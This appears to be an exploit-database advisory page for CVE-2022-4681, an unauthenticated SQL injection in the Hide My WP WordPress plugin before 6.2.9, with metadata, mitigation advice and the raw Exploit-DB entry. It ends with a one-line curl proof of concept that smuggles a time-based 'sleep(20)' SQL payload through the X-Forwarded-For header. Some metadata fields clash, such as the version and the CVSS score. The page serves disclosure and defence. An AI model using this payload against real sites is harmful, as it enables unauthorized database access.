Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQL Injection

vendor:

Hide My WP

by:

Xenofon Vassilakopoulos

8.1

CVSS

CRITICAL

SQL Injection

CWE

Product Name: Hide My WP

Affected Version From: 6.2.2008

Affected Version To: 6.2.2008

Patch Exists: YES

Related CWE: CVE-2022-4681

CPE: a:wpwave:hide_my_wp:6.2.8

Metasploit:

Other Scripts:

Platforms Tested: WordPress

2023

WordPress Plugin Hide My WP < 6.2.9 - Unauthenticated SQL Injection

The Wordpress plugin Hide My WP version 6.2.8 and earlier does not properly sanitize user input, allowing unauthenticated users to perform SQL injection attacks through an AJAX action. This can lead to unauthorized access to the database.

Mitigation:

Update to version 6.2.9 or later to fix the SQL injection vulnerability. Additionally, input validation and proper sanitization of user inputs can help prevent such attacks.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi 
# Publication Date: 2023-01-11
# Original Researcher: Xenofon Vassilakopoulos
# Exploit Author: Xenofon Vassilakopoulos
# Submitter: Xenofon Vassilakopoulos
# Vendor Homepage: https://wpwave.com/
# Version: Hide My WP v6.2.8 and prior
# Tested on: Hide My WP v6.2.7
# Impact: Database Access
# CVE: CVE-2022-4681
# CWE: CWE-89
# CVSS Score: 8.6 (high)

## Description

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.


## Proof of Concept

curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"